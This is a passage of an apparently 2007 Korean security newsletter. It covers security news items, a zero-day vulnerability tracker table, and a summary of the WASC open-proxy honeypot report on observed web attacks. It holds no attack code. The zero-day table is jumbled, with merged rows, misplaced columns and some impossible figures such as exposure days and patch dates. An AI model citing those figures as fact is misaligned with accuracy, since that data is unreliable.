구매한 물건의 미배달이나 미지불이 19%를 차지했다. 가장 큰 손해액은 나이지리아 사기 메 일로, 신고된 손해액은 1인당 평균 5,100 달러, 수표 사기가 3,744 달러, 투자 사기가 2,694 달러였다. VoIP 보안 툴 (출처: http://www.voipsa.org/resources/tools.php) VOIPSA(The Voice over IP Security Alliance)가 VoIP 보안툴 리스트를 릴리스했다. VOIPSA는 Verizon, 노텔 네트워스, 베리사인, 프라이스워터하우스쿠퍼스를 비롯, 50여개의 공 급 업체 및 서비스 업체들로 구성된 그룹으로 2005년 창설되었다. 이 리스트는 VoIP 스니핑 툴, VoIP 스캐닝 및 Enumeration 툴, VoIP 패킷 생성 플러딩 툴, VoIP Fuzzing 툴, VoIP 시 그널링 조작 툴, VoIP 미디어 조작 툴, 기타 툴, 튜토리얼, 프레젠테이션 등을 다루고 있다. 무선 포인터, 마우스, 키보드 해킹 (출처: http://news.com.com/8301-10784_3-9710969-7.html http://jeru.ringzero.net/docs/csw07-luismiras.pdf ) 프레젠테이션을 하는데 슬라이드가 이상하게 돌아간다면? 방에 루이스 미라스가 있는지를 의심해 볼 필요가 있다. 취약점 연구원이자 리버스 엔지니어링 전문가 미라스가 4월 19일 개 최된 보안 이벤트 CanSecWest에서 무선 프레젠터를 사용해 프레젠테이션을 한다면 실시간으 로 장악하는 것이 가능하다고 발표했다. 이 해킹을 위해 든 비용은 무선 신호를 캡처하기 위한 디바이스130 달러였다고 한다. - 15 -

Miras는 프레젠테이션 동안 트래픽을 스니핑해 프레젠테이션 하는 사람이 어떤 툴을 사용하 는지 알 수 있도록 설정하고, 슬라이드를 앞이나 뒤로 돌리거나 시작하거나 멈출 수 있었다. 만일 사람들과 가까이 있는 환경에서 무선 데스크탑을 사용한 공격에 성공한다면, 보안 문제 가 발생할 수도 있다고 기사는 지적했다. 마이크로소프트 - 스크린 분할 소프트웨어 개발 (출처: http://dsc.discovery.com/news/2007/05/04/splitscreen_tec.html?category=technology&guid=2 0070420091530 ) 인도 마이크로소프트가 모니터 스크린을 반으로 분할해 별도의 운영 시스템, 데스크탑, 어플 리케이션, 커서, 키보드를 한 대의 모니터상에서 사용할 수 있는 프로그램을 개발했다. 이 소 프트웨어를 설치하면, 한 대의 컴퓨터에 제2의 키보드와 마우스를 추가할 수 있다. 비디오 게임에 이 컨셉을 도입하면, 한대의 컴퓨터로 두 사람이 게임을 하는 것이 가능하다. 또한 커서가 경계선을 넘어가는 것도 가능하가 때문에, 공유와 문서 공동작업의 장을 열어주는 것이라는 기술이라는 평을 받고 있다. 이 기술은 소규모 비즈니스나 개발 도상국의 학교에서 컴퓨터 구입 비용을 줄일 수 있으며, 가정에서도 두 사람이 한대의 머신에서 프로세서와 모니 터를 공유해 작업을 독립적으로 할 수 있다고 한다. 19인치 표준 모니터를 사용하지만, 15-17 인치 스크린도 가능하며, 사용법은 소프트웨어를 설치한 후, 제2의 마우스와 키보드만 꽂으면 된다고 한다. - 16 -

닷RU 후이즈 정보 비공개될 듯 (출처: http://blog.icann.org/?p=110 ) 앞으로 러시아.ru 사이트 후이즈 정보를 확인하는 것이 어려워질 것 같다. ICANN 블로그는 5월 1일 웹사이트를 통해 다음과 같이 전했다: 러시아에 새로운 데이터 정보법이 통과되었다. 이 법규에 의하면, 앞으로 웹사이트 소유자 관련 정보를 온라인상에서 열람하는 것이 금지된다. 닷RU 후이즈 데이터베이스는 2010년 1월 1일까지 이 법규에 따라야 한다. 그러나 닷RU 의 가장 큰 레지스트라인 Ru-Center는 이 문 제를 RIPN과 논의해 다음달에 이행할 수 있다고 말했다. 구글-웹기반 안티바이러스 서비스 제공 시사 (출처: http://www.newscientisttech.com/channel/tech/mg19426026.000-web-browsers-are-newfrontline-in-internet-war.html) 방화벽 시대는 갔다: 웹브라우저가 인터넷 전쟁의 새로운 미개척지로 등장 구글은 얼마 전부터 검색 결과 리스트 중 맬웨어를 포함한 사이트로 구글이 분류한 사이트 의 경우, "해당 사이트는 컴퓨터에 해를 미칠 수 있습니다." 라는 경고문을 알리는 서비스를 제공해왔다. 클릭한 검색결과가 현재 사용중인 컴퓨터에 악성 소프트웨어를 설치할 가능성이 있는 사이트라고 판단되었을 경우, 경고 메시지를 보낸다는 것이 구글의 설명이다. 이제 구글은 이 서비스를 확장해 인터넷상의 모든 웹페이지를 분석, 악성 코드를 포함한 사 이트를 식별해 사용자에게 경고를 보내는 자동 보안 서비스를 계획 중이다 방화벽이나 안티 바이러스는 웜이나 바이러스 같은 기존의 위협을 막아줄 수는 있지만, 브라 우저를 경유한 데이터 다운로드는 탐지하지 못하기 때문에 공격자가 익스플로잇 할 수 있는 루프홀을 제공한다. "방화벽 시대는 갔다"고 구글 보안 전문가 닐스 프로보스는 뉴사이언티스 트지를 통해 말했다. PC를 좀비 봇넷으로 전환시키는 바이러스를 배포하는 웹사이트에 관한 우려가 확산됨에 따 라, 구글이 웹을 단속하는 계획을 세우고 있는 것으로 보인다. 만일 이 계획이 실현된다면, 구 글은 새로운 소프트웨어를 사용해 자동으로 구글 데이터베이스상의 감염된 웹페이지를 식별해 검색 결과에 해당 페이지를"잠재적으로 유해한" 사이트라는 라벨을 붙이게 될 것 같다. 프로보스는 구글이 봇넷 감염 전파에 신경을 바싹 곤두세우고 있다고 말했다. 봇넷 바이러스 는 보통 이메일 첨부파일이나 컴퓨터 웜을 통해 전파된다. 양쪽 모두 방화벽으로 차단하거나 안티 바이러스 소프트웨어로 스니핑 될 수 있다. 사용자들이 이메일 첨부파일을 경계하고, 방 화벽과 안티 바이러스 소프트웨어를 사용하자 지난 몇 년 간 봇넷 제작자들은 멜웨어 배포에 웹사이트를 사용하기 시작했다. 지난달 캠브리지에서 개최되었던 봇넷 미팅에서 프로보스는 많은 웹 사용자들이 브라우저 취약점을 이용한 봇넷 "drive-by" 다운로드의 표적이 되고 있다고 경고했다. 방화벽은 브라우 - 17 -

저를 통한 프로그램 다운로드나 코드를 허용하기 때문에, PC에 봇이 인스톨 될 수 있다는 것. 일부 봇 중에는 안티 바이러스 소프트웨어의 탐지를 피하고 즉각 disable할 수 있는 기능을 가 진 것들도 있다. 프로보스가 최근 행한 구글 연구 조사에 의하면, 약 45만개의 웹페이지가 악성 프로그램들 을 drive-by 다운로드하고 있으며, 70만개의 페이지가 의심스런 소프트웨어 다운로드를 런치 하고 있다는 것이 밝혀졌다고 한다. 식별된 악성 프로그램의 2/3가 컴퓨터를 감염시키는 봇넷 소프트웨어나 은행 계정 데이터를 수집해 임시 이메일 계정으로 전송하는 프로그램이라고 한 다. 웹사이트를 방문하거나 링크를 클릭하는 것을 망서리게 만드는 것은 구글 비즈니스에 큰 위 협이다. 프로보스와 4명의 구글 직원이 작성한 보고서는 The Ghost in the Browser는 구글이 이 문제를 어떻게 준비하고 있는지를 보여준다. 구글은 자동 보안 분석을 스파이더링과 사이트 인덱싱에 포함시키고, 사용자들이 웹 브라우징 하는 동안 감염되는 것을 막기 위해, 잠재적으 로 악성 기능을 포함하는 인터넷상의 모든 웹페이지 식별 작업 중이다. 중국 - 청소년 온라인 게임 하루 3시간으로 제한 (출처:http://english.people.com.cn/200704/10/eng20070410_364977.html) 앞으로 중국 인터넷 게임 업체들은 청소년 보호를 위해 인터넷 게임 시간을 제한하는 anti-addiction 소프트웨어를 게임에 설치해야 한다. 중국 정부는 4월 9일, 온라인 게임업체들은 4월 15일부터 의무적으로 "game fatigue 시스템 "을 설치해야 한다고 발표했다. "game fatigue 시스템"은 18세 이하의 청소년들에게 하루 3시 간만 게임을 할 수 있도록 권하는 시스템으로, 온라인 게임을 하려면 실명 등록을 해야 하며, 18세 미만인 경우 아이디 카드 번호를 등록해야 한다. "anti-online game addiction system" 이라 알려진 이 프로그램은 처음 게임을 시작한 시점부터 3시간 동안은 가상 포인트를 받을 수 있지만, 4시간이 지나면 포인트가 절반으로 줄고, 5시간이 지나면 포인트를 받지 못하며, 게임시간이 초과되었으니 접속을 해제하라는 경고가 15분 간격으로 보내진다. MMORPG, Shanda, NetEase, The9 를 포함, 현재 중국에서 운영되는 모든 온라인 게임은 7월 16일까지 이 프로그램을 설치해야 하며, 7월 16일이 지나면 이 프로그램을 설치하지 않은 게임을 할 수 없게 된다. 중국 와우게임 대변인 Zhao Yurun은 와우게임 사용자들이 대부분 성인이기 때문에 이 조치는 와우게임에 큰 영향을 주지 않을 것이라 말했다. 작년도 중국 온라인 게임 사용자는 3112만명으로, 이 중 10%가 18세 미만이라고 한다. 전문가들은 실명가입 제도로 인해 게임 운영에 위협이 될 수도 있을 거라고 말한다. 공식적 은 통계에 의하면, 중국 인터넷 사용자는 2006년도 중반 1억 2천 3백만명으로, 이 중 1천 8백 만명이 18세 이하다. - 18 -

마이크로소프트 블루햇 보안 브리핑 2007 (출처: http://www.microsoft.com/technet/security/bluehat/2007spring.mspx#ev http://channel9.msdn.com/showpost.aspx?postid=194518#194518) 제 5회 마이크로소프트 블루햇 브리핑 이벤트가 5월 11일 개최되었다. 지난 2005년 처음 개최된 이후 마이크로소프트가 연간 2회 개최하는 이번 행사에는 다음과 같은 내용들이 발표 되었다: 1. 웹 어플리케이션 보안 웹 어플리케니션 보안의 새로운 미 개척지다. 방화벽, IDS, IPS는 거의 필수가 되다시피했 지만, 오늘날 위협은 네트워크 보안와 웹사이트 공격의 전체 개념을 완전히 우회하고 있 다. 이 중 다수가 웹사이트를 전혀 손상하지 않으면서, 사용자와 기업에 나쁜 영향을 미칠 수 있는 것들로, 피싱, XSS, 크로스-사이트 요청 위조를 비롯 많은 기술들이 함께 사용되 어 위협을 증가시키고 있다. 이 세션은 광범위한 웹사이트 디자인의 위협의 기술적 측면 을 다룬다. 발표자: RSnake Robert "RSnake" Hansen(ha.ckers.org)은 웹 어플리케이션 및 네트워크 보안 컨설팅사 Sec Theory의 CEO로, 1990년대 중반부터 웹 어플리케이션 보안직에 종사해 왔다. ValueClick에서 배너 클릭 사기 탐지를 비롯, Cable & Wireless사의 보안 서비스 담당, 이베이의 글로벌 상품 보안 수석 매니저로 안티 XSS, 안티 바이러스 전략 수립을 담당했 다. 웹 어플리케이션 보안 연구소 ha.ckers.org 설립자인 "Rsnake"로 널리 알려져 있다. WASC, IACSP, ISSA 멤버이며, OWASP 2.0 가이드에 참여했다. 2. 마이크로소프트 보안 툴 침입하기 늘어나는 보안툴들이 공격자의 타겟이 되고 있다. 이 세션은 안티 바이러스 벤더에 존재 하는 리모트 코드 실행 취약점, 시그니처를 삭제하는 바이러스, 최신 운영 시스템 라이센 스 및 DRM 공격, 영화나 게임 복제를 방지하는 DRM 해킹 및 해커가 이런 보안툴들을 어떤 방식으로 분석/테스트/공격/우회하는지를 다룬다. 이 기술은 보안 툴만이 아니라 DRM 보호에도 적용된다. 발표자: Errata Security의 David Maynor & Robert Graham - 19 -

David Maynor는 Errata Security 설립자이자 CEO로, 시큐어웍스의 수석 연구원, ISS Xforce R&D 팀 엔지니어 등을 역임했다. Robert Graham은 1988년 최초의 개인 방화벽 블랙 아이스를 제작했고, 199년에는 IPS를 제작했다. 2001년부터 2006년 사이 ISS 수석 사이언티스트로 재직했으며 현재 Errata Security의 CEO다. 3. 떠오르는 모바일 보안 문제점들 모바일 디바이스는 중요한 공격 타겟이 되고 있다. 모바일 디바이스는 민감한 정보를 보 관하고, 금융 거래를 수행하고, 네트워크 리소스에 접속하는 권한을 획득하는 기능을 갖고 있다. 새로운 기능들과 무선 네트워크 접속 증가로 인해 모바일 디바이스를 타겟으로 하 는 공격이 떠오르고 있다. 이 세션은 모바일 디바이스 관련한 보안 문제점과, 해커들이 어 떻게 모바일 디바이스를 공격하는지와, 최근 출시된 윈도우즈 모바일 제품의 각종 취약점 을 다룬다. 발표자: Flexilis의 John Hering와 John Hering Kevin Mahaffey는 Flexilis사의 CTO로, 보안 리서치 및 모바일 디바이스 보호 테크놀로 지를 개발하고 있다. 그는 블랙햇과 데프콘에서 RFID와 블루투스 보안에 관한 프레젠테이 션을 한 바 있다. John Hering은 Flexilis 공동 설립자로 모바일 보안 리서를 담당하고 있 다. 1.12 마일 밖에서 블루투스를 이용한 모바일 디바이스 공격을 성공시켰던 "BlueSniper" 프로젝트를 수행한 바 있다. 이밖에 보안 시스템 공격 사례, 온라인 범죄가 거래되는 언더그라운드 경제의 실상 등이 발표되었다. 미국-인터넷 구조를 재설계 연구 중 (출처: http://news.yahoo.com/s/ap/20070413/ap_on_hi_te/rebuilding_the_internet) 초기 인터넷은 사용자와 데이터를 신뢰한다는 가정 하에 설계되었기 때문에 오늘날 보안 관 련 문제가 끊이지 않고 있다. 이 문제점을 해결하기 위해 인터넷 구조 자체와 주소 체계를 변 경해야 한다는 주장이 제기되고 있다. 미국 정부기관 및 대학들이 해결책을 모색 중이다. 인터 넷은 많은 상황에서는 작동이 잘 되지만, 설계 자체가 지금과는 전혀 다른 가정 하에 이루어진 것이기 때문에, 인터넷의 근본적인 구조를 재고해야 할 때가 왔다고 연구원들은 말한다. 연구 원들은 그 방법으로 네트워크 장비를 교체하고, 새로운 소프트웨어를 개발해 미래의 트래픽 채 널을 개선하는 등을 제안하고 있다. - 20 -

빈트 서프는 현재 테크놀로지가 모든 필요를 충족시키지 못하기 때문이 이 연구가 대체적으 로 바람직하다고 말했다. 미국 국립과학재단은 GENI(Global Environment for Network Innovations)라 불리는 네트워크 프로젝트를 진행하기 위해 FIND(Future Internet Network Design)를 통해 대학들에 각종 프로젝트 자금을 대주고 있다. 미 Rutgers 대학, 스탠포드, 프 린스턴, 카네기 멜론, 메사추세츠 기술 연구소는 개별적인 프로젝트를 진행 중이며, 미 국방부 를 포함한 타 기관들도 연구를 계속해 왔다. 유럽연맹도 FIRE(Future Internet Research and Experimentation)이라 불리는 프로젝트를 통해 연구를 해왔다. 미 정부 기관과 연구원들은 지 난달 스위스 쥬리히에 모여 이 문제에 대한 대책을 논의했다: CLEAN-SLATE 솔루션이라 불리는 이 솔루션은 새로운 네트워크는 당장은 현재의 인터넷 과 병행하다가 궁극적으로 전체 구조를 변경하거나, 현존하는 구조 중 주요한 부분을 총 점검 하는 방향으로 진행될 수 있다. 보안 문제점: 초기 인터넷은 신뢰 기반으로 구축되어 누가 무엇을 보냈는지를 확인할 수 없는 메커니즘으로 설계되었다. 인터넷 프로토콜은 사용자와 데이터를 인증하도록 설계되지 않았기 때문에 스패머와 해커들은 가짜 리턴 어드레스로 데이터 패킷을 위장할 수 있다. 방화벽과 스팸 필터 등의 보안 관련 인터넷 어플리케이션들도 네트워크 깊은 곳까지 방어하지 는 못하기 때문에 여전히 악성 데이터가 전송되고 시스템에 해를 끼치고 필터링 기술을 우회 한다. CLEAN-SLATE SOLUTION: 애당초 네트워크는 모든 사용자와 데이터 패킷을 의심한다는 가정 하에 설계되었어야 했다. 네트워크를 재설계해 패킷이 인증되기 전에 데이터를 통과시키 지 못하게 해야 한다. 이동기기 문제점: 초기 인터넷은 컴퓨터가 항상 고정된 위치에 있고, 항상 접속되어 있다는 가 정 하에 설계되었기 때문에 오늘날 랩탑, 핸드헬드 디바이스, 모바일 디바이스 등 무선 AP를 수시로 바꾸는 이동기기에는 적합하지 않다. 숫자로 구성된 인터넷 주소는 이동하는 경우가 드문 컴퓨터를 기준, 위치 기반으로 할당되었 다. 반면 랩탑은 이동성이 있다. 랩탑은 무선 AP에서 다른 AP로 이동할 때마다 주소를 바꾸 고 재접속 된다. 랩탑이 제2, 제3의 장소로 이동할 때 전체적인 트래픽 채널을 최초의 AP로 보내는 방법도 있지만, 원거리상에서는 지연되는 결과를 가져온다. THE CLEAN-SLATE SOLUTION: 주소의 디바이스 위치 의존도를 줄이고 디바이스 자체에 기반하도록 시스템 주소를 재구성해, 랩탑의 경우 다중 핫스팟을 통해 이동 시 주소를 계속 유지할 수 있도록 해야 한다. UBIQUITY : 인터넷은 인터넷에 접속하는 컴퓨터의 수가 적을 당시 설계되었다. 개인 컴퓨터 - 21 -

및 모바일 디바이스의 급격한 증가로 인해 주소 시스템 부족 현상이 빚어졌다. 앞으로는 인터 넷을 이용하는 가전기기나 에어컨, 온도 및 주차장 공간을 측정하는 센서 등등 더욱 많은 디 바이스도 주소를 필요로 하게 될 것이다. 이에 대한 대책으로 IPv6가 등장했지만, 이 작업이 완성되려면 거의 10년이 걸리며, 많은 소프트웨어와 하드웨어들은 여전히 IPv4를 사용하고 있다. IPv6로 바꾸더라도 모든 센서에 대한 주소 프로세싱은 부담스러운 작업이 될 수 있다. THE CLEAN-SLATE SOLUTION: 모든 디바이스가 진정으로 주소를 필요로 하는지를 재확 인 하는 것이 필요하다. 가정의 센서는 로컬로 다른 센서와 커뮤니케이션 하도록 하고, 주소 가 부여된 게이트웨이를 통해 중요한 데이터를 주고받게 하는 방식으로 효율성을 개선해야 한 다. 이러한 노력은 아직 초기 단계로, 자금 문제로 인해 향후 10-15년 동안 계속 진행될 가 능성은 없어 보인다. 미 스탠포드 대학의 Guru Parulkar는 GENI 프로젝트에만도 3억 5천만 달러가 소요될 것이라며, 현존하는 시스템의 모든 소프트웨어와 하드웨어를 교체하는 데에 수 십억 달러가 들 것으로 예상했다. 미 국방부-IRIS 프로젝트 발표 (출처: http://news.bbc.co.uk/2/hi/technology/6551807.stm) 앞으로 지상 기지국이 없어지는 날이 올 수도 있을 것 같다. 미 국방부는 라우터를 위성에 설치한다는 프로젝트를 수행 중이라고 하는데, 이 프로젝트가 완성되면 지상 기지국을 통하지 않고 위성간의 데이터 교환이 가능해 진다고 한다. 이 프로젝트는 현재 사용되는 IP를 그대로 사용할 것이라 한다. 영국 BBC는 4월 13일 미 국방부의 IRIS(Internet Routing in Space) 프 로젝트를 다음과 같이 보도했다: 미 국방부가 추진 중인 Iris 프로젝트는 2009년까지 인터넷 라우터를 우주에 설치한다는 프 로젝트다. 현재 대부분 위성은 지상 기지국이나 전파 신호를 통해 커뮤니케이션을 하고 있지 만, 우주로 네트워크를 확장하는 Iris가 완성되면, 지상 기지국을 통하지 않고 위성간의 데이터 교환이 가능해지게 된다. Iris는 음성, 비디오, 데이터 커뮤니케이션에 현재의 인터넷 표준인 IP를 사용한다. 이 프로그램은 전쟁시에 사용될 수 있는 고급 기술로, 3년 안으로 프로젝트로 위성 플랫폼과 우주용 라우터를 개발하는 것을 목표로 하고 있다. 라우터는 네트워크상에서 정보 패킷을 보내 는 하드웨어 중 하나로, 정지위성IS-14 개발은 Intelsat이, 장비 개발은 시스코가 맡게 된다. Iris는 인터넷을 우주로 확장하고, 위성 시스템과 지상 인프라를 통합한다는데 의의가 있다. 테 스트 후 위성은 상용으로 개방될 것이라 한다. Iris의 런치는 우주에서의 인터넷 개발의 신호 탄이 될 것이다. 인도 - 10달러 랩탑 개발 중 (출처:http://www.betanews.com/article/Indian_Engineers_Aiming_for_10_Laptop/1178307550 ) - 22 -

인도 엔지니어들이 10달러짜리 랩탑을 개발하는 방안을 모색 중이다. 10달러 랩탑은 최근 100달러 랩탑 가격이 인상된데 대한 대응으로, 인도 정부는 현재 2개의 디자인을 심사 중이 다. 하나는 인도의 기술학교 학생이 제작한 것이고, 다른 하나는 인도 과학 연구소에서 제작한 것으로, 양쪽 모두 10달러라는 제작비를 충족시키지는 못했지만, 거의 47달러로 맞출 수 있었 다고 한다. 원가가 많이 드는 요인으로, 다수 부속품들이 다른 곳에서 제조된다는 점이 지적되어, 일부 부속은 인도 내에서 제조될 수도 있다고 한다. 완성되려면 최소한 2년이 걸린다고 한다. 제로-데이 현황 (출처: http://research.eeye.com/html/alerts/zeroday) eeye- 제로데이 트래커: eeye가 2006년 12월 런치한 이 사이트는 제로데이 취약점 및 보 안 패치가 릴리스되기 전 익스플로잇이 알려진 취약점 관련 정보를 다룬다. eeye의 제로데이 트래킹 사이트는 취약점 관련된 상세 정보와 개선책을 제공한다. 이 사이트는 eeye 보안 연구 원들에 의해 운영되지만 보안에 관심 있는 전문가들의 제안도 받고 있다. 시큐니아도 Secunia Software Inspector 라는 사이트를 개설했다. 이 사이트는 브라우저, 인 스턴트 메신저 클라이언트, 미디어 플레이어를 비롯, 널리 사용되는 소프트웨어 패키지 중 보 안상 안전하지 못한 버전 정보를 제공하는 툴을 릴리스했다. 이 툴은 안전하지 못한 소프트웨 어 패키지를 실행할 때 무엇을 해야 할지를 알려준다. 두 사이트 모두 무료로 서비스를 제공하 고 있다. 현재 33개의 제로데이 취약점과 활성화된 제로데이 취약점 숫자, 노출되고 나서 현재 까지 날짜, 취약점을 클릭하면 eeye가 제공하는 정보페이지로 연결된다. 알려진 날짜, 벤더, 어플리케이션, 위험도, 패치되지 않은 제로-데이 취약점(2007.5.11 기준) 취약점 발견된 날짜 벤더 어플리케이션 위험도 노출 일수 Internet Connection Sharing DoS 2006.10.28 MS 윈도우즈 중간 195일 MS 오피스 2003 PPT 로컬 DoS 2006.10.12 MS 파워포인트 중간 211 RPC Memory Exhaustion 2006.11.16 MS 윈도우즈 낮음 541 패치된 제로-데이 취약점 취약점 발견된 날짜 벤더 어플리케이션 위험도 패치일 노출 일수 - 23 -

Winamp.MP4 Code Execution 2007.4.30 AOL Music 윈앰프 높음 2007.5.4 4 Microsoft DNS RPC Buffer Overflow 2007.4.7 MS Brightstor Backup Mediasvr.exe RPC 2007.3.29 Computer Associates 윈도우즈 DNS 서버 높음 2007.5.8 31 BrightStor 높음 2007.3.29 26 Windows.ANI Processing 2007.3.28 MS 윈도우즈 높음 2007.3.28 6 Sun Solaris Telnet Bypass 2007.2.12 Sun 솔라리스 높음 2007.2.14 2 Word Unspecified Exploit 2007.2.9 MS 워드 중간 2007.2.9 88 Office Unspecified Exploit 2007.2.2 MS 오피스 높음 2007.2.17 15 Word Unspecified Exploit 2007.1.25 MS 워드 높음 2007.2.13 19 Apple QuickTime RTSP URL Buffer Overflow 2007.1.1 애플 퀵타임 높음 2007.1.23 22 Windows MessageBox / NtRaiseHardError 2006.12.15 MS 윈도우즈 중간 2007.4.10 116 Word 12122006-djtest.doc 2006.12.12 MS 워드 치명적 2007.2.17 67 Word Unspecified Exploit 2006.12.10 MS 워드 높음 2007.2.13 65 Word Unspecified Exploit 2006.12.5 MS 워드 높음 2007.2.13 70 Adobe ActiveX 2006.12.5 어도브 ASX Playlist 2006.11.22 MS Windows GDI Local Privilege Escalation XMLHTTP 4.0 ActiveX 2006.11.4 MS Acrobat ActiveX 윈도우즈 미디어 플레이어 높음 2007.11.28 7 높음 2006.12.12 20 2006.11.6 MS 윈도우즈 중간 2007.4.3 148 XML Core Services 높음 2006.11.14 10 ADODB.Connection ActiveX 2006.10.27 MS 인터넷 익스플로러 높음 2006.10.27 109 McAfee Network Agent 2006.11.7 맥아피 Internet Security 높음 2006.11.7 26 Suite PowerPoint Controlppt 2006.9.27 MS 파워포인트 높음 2006.10.10 13 IE VML 2006.9.19 MS 인터넷 익스플로러 높음 2006.9.19 7 IE DAXCTLE.OCX KeyFrame 2006.9.13 MS 인터넷 익스플로러 높음 2006.11.14 62 Word Mdropper 2006.9.1 MS 워드 높음 2006.10.10 39 IE DAXCTLE.OCX Spline 2006.8.28 MS 인터넷 높음 2006.11.14 78-24 -

익스플로러 WMI Object Broker ActiveX 2006.8.10 MS 비주얼 스튜디오 높음 2006.12.12 124 2005 Server NETAPI32 2006.8.8 MS 윈도우즈 높음 2006.8.8 0 IE setslice() 2006.7.18 MS 인터넷 익스플로러 높음 2006.10.10 84 PowerPoint PPDropper 2006.7.12 MS 파워포인트 높음 2006.8.8 27 Excel nanika.xls 2006.6.14 MS 엑셀 높음 2006.10.10 118 Word2003 Ginwui 2006.5.18 MS 워드 높음 2006.5.18 26 IE createtextrange() 2006.3.22 MS 인터넷 익스플로러 높음 2006.4.11 20 WMF Metafile 2005.12.27 MS 윈도우즈 높음 2006.1.5 9 IE JAVAPRXY.DLL 2005.6.29 MS 인터넷 익스플로러 높음 2005.7.12 13 IE window() 2005.5.31 MS 인터넷 익스플로러 높음 2005.12.13 196 NTDLL "IIS WebDAV" 2003.3.17 MS 윈도우즈 높음 2003.4.23 37-25 -

SECON 웹 해킹 보안 이슈 [보고서] WASC 웹 보안 위협 보고서(2007년 1월 - 4월) WASC가 1월에서 4월 사이에 실제로 발생했던 리얼-타임 공격들을 토대로 작성한 보고서 를 릴리스 했다. 웹 어플리케이션 보안 컨소시엄(WASC)의 Ryan C. Barnett 이 보안 위협 보고서를 릴리스 했 다. 이 프로젝트는 웹 공격자가 가장 신뢰하는 툴인 오픈 프록시 서버를 사용한다. 오픈 프록 시 서버는 공격 타겟이 되는 대신, 공격자 데이터가 드나드는 통로 역할을 하면서 공격 데이터 를 수집한다. 이 프로젝트는 특수하게 설정된 다중 프록시 서버를 통해 시스템을 오가는 악성 트래픽 유형을 관찰하는데 목적이 있다. 허니팟 시스템은 HTTP 트래픽을 리얼-타임으로 분 석해 요청들을 웹 보안 위협 등급이 지정한 위협 등급으로 분류하고 데이터를 로그한다. 이 프로젝트는 실제 행해지고 있는 웹 공격을 분석한다. Ryan은 전 세계 7개 지역에 위치한 프록시로 힘든 작업을 했고, 그 덕분에 이론적인 공격에서 실제 현실에서 발생하는 생생한 공 격을 접할 수 있게 되었다고 한다. 이 보고서는 SQL 인젝션 공격, 무작위 공격, OS 커맨드 인젝션, 웹 변조 시도, 구글 해킹 및 배너애드/클릭 사기, 정보 유출 등을 다루고 있다. [제목] WASC 웹 보안 위협 보고서(2007년 1월 - 4월) (출처: http://www.webappsec.org/projects/honeypots/threat_report_05072007.pdf) 작성자: Ryan C. Barnett (WASC 멤버. 분산 오픈 프록시 허니팟 프로젝트 리더) 보고서가 다루는 내용 실제의 라이브 웹 공격 데이터를 다룬다. (이 공격 데이터 중 어느 것도 연구소에서 시연되거나 생성된 적이 없다) 데이터는 WASC 분산 오픈 프록시 허니팟 프로젝트로부터 수집한 것이다. (데이터는 MODSecurity 허니팟 센서에 의해 식별되었다) - 26 -

릴리스 목적 웹상에서 수행되고 있는 웹 공격의 유형의 구체적인 예저를 제공해 웹 공격 메트릭스를 지원 실제 공격에 대한 일반의 주의 환기 화이트햇이 커뮤니티에 제출하는 복잡한 공격들의 "실제" 위협에 대한 논의가 종종 있 다. 이 공격들이 정말로 사이트를 해치는데 사용되는가? WASC 분산 오픈 프록시 허니팟 프로젝트 목적: 최근 웹 공격을 식별/차단/보고 메서드: 웹 공격의 타겟 역할을 하는 대신, 오픈 프록시 서버를 제공해 공격자들이 공격을 실행하도록 한다. 공격자들은 근원지를 감추기 위해 오픈 프록시 서버를 사용한다. 사용된 툴: MODSecurity 2.x, Core Rules, ModSecurity 콘솔 웹사이트: 프로젝트 웹사이트: http://www.webappsec.org/projects/honeypots/ 활동중인 프로젝트 센서 전세계 7개 지역에 프로젝트 센서가 있으며, 그 위치는 다음과 같다: - 러시아 모스크바 - 그리스 크레테 - 독일 칼즈루어 - 미국 캘리포니아주 샌프란시스코 - 미국 버지니아주 노퍽 - 미국 버지니아주 Falls Church - 미국 알라바마주 Foley 조만간 더욱 많은 센서들이 설정될 예정이다. 항상 더 많은 참여를 바라고 있다. - 27 -

프로젝트 구조 공격 응답 방식 - 28 -

ModSecurty 콘솔 경고 인터페이스 하이-레벨 통계 전체 요청수 969581 전체 경보수 170984 전체 클라이언트수 1161(허니팟에 직접 접속한 리모트 IP 주소 숫자를 말한다) 다른 프록시 서버를 통해 looping하는 클라이언트수 8264 (x-forwarded-for request headers에서 식별된 IP 주소) 전체 타겟 69162 (타겟 웹사이트수) Top 5 트렌드 1. 정보 누출은 큰 문제점이다. - 대부분 웹사이트는 클라이언트에게 상세한 에러 메세지를 제공하도록 설정되어 있 다. 2. 웹 공격의 대부분은 자동화 되어있다. - 안티-자동화 방어의 필요성을 증가시킨다. 3. 공격자들은 쉬운 타겟을 찾고 있다. - 취약점 입수--> 사이트 발견 - 29 -

- 사이트를 입수하는 대신 --> 취약점 발견 4. 기본 웹 어플리케이션 필터(MODSecurity 등)는 대부분 공격 소음을 차단할 수 있다. 5. 이벤트 데이터와 로그의 전체적인 검토는 포렌식에 필수다. Top 5 ModSecurity 공격 범위 Core Rule 메시지 데이터 요청수 User-Agent 헤더 변수값 미설정 6298 호스트 헤더 미설정 36407 Accept Header 미설정 28299 호스트 헤더가 IP인 경우 13203 자동화된 클라이언트 11025 UTF9 인코딩을 이용한 공격 시도 2759 정책상 제한된 URL 파일 익스텐션 1814-30 -

XSS 공격 1717 URL 인코딩 공격 시도 1133 IIS 정보 유출 618 시스템 커맨드 인젝션 505 PHP 소스코드 유출 480 허용되지 않은 컨텐트 인코딩 291 야후 로봇 214 존재하지 않는 어플리케이션 133 정책상 허용되지 않는 메서드 69 허용되지 않는 HTTP 프로토콜 버전 50 ASP/JSP 소스코드 유출 42 구글 로봇 30 Blind SQL 인젝션 공격 12 WASC 위협 분류 1. 인증 1.1 무작위 1.2 불충분한 인증 2. 권한부여 2.1 Credential/Seccion Prediction 2.3 불충분한 세션 만료 2.4 세션 고정 - 31 -

3. 클라이언트-사이트 공격 3.2 크로스-사이트 스크립팅 4. 커맨드 실행 4.4 OS 커맨딩 4.5 SQL 인젝션 4.6 SSI 인젝션 5. 정보 공개 5.2 정보 누출 5.3 경로 유출 6. 로지컬 공격 6.1 기능 악용 무작위 대입 무작위 대입 공격은 개인의 유저네임, 패스워드, 신용카드 번호 혹은 암호키를 추정 하는데 사용되는 트라이얼과 에러의 자동 프로세스를 말한다. 우리가 식별한 공격들은 다음과 같다: - HEAD 매서드 스캐닝 - GET 메서드 로깅 스캐닝 - POST 메서드 로그인(Form-기반 권한부여) - 32 -

